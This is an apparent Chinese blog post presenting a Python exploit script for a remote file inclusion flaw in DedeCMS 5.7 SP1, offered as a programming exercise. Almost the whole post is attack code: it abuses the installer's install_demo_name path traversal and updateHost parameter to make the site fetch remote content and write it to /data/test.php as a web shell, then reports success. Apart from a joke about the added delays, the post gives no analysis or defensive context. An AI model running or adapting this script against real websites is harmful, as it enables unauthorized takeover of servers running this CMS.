python学习之dedecms exp编写
针对织梦5.7 sp1远程文件包含getshell exp编写,漏洞分析请查看网上分析,不再赘述。
exp
# -*- coding:utf-8 -*-
import requests
import time
def dada(url):
url_index=url+"/install/index.php"
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 \
(KHTML, like Gecko) Chrome/51.0. 2704.103 Safari/537.36"}
try:
url_request=requests.get(url_index,headers)
time.sleep(3)
if(url_request.status_code==200):
print("漏洞文件存在,开始测试")
time.sleep(5)
url_url = url + "/install/index.php?step=11&insLockfile=a&s_lang=x&install_demo_name=../data/admin/config_update.php" # 重置其参数
print(url_url)
requests.get(url=url_url, headers=headers) # 发送重置请求
# time.sleep(2)
url_url2 = url + "/install/index.php?step=11&insLockfile=a&s_lang=x&install_demo_name=../data/test.php&updateHost=http://127.0.0.1/" # 换成存在demodata.x.txt地址
print(url_url2)
requests.get(url=url_url2, headers=headers) # 发送exp
url_exp = url + "/data/test.php"
url_final = requests.get(url=url_exp, headers=headers)
if url_final.status_code == 200:
print("攻击成功,请访问 \n "+url_exp)
else:
print("测试失败,请人工测试")
else:
print("检测完成,该漏洞不存在")
except:
print("error:请检测网络或者url地址")
#print(url)
if __name__ == '__main__':
dada("http://127.0.0.1/dede/dedecms")
不要问我为什么加延迟,因为逼格高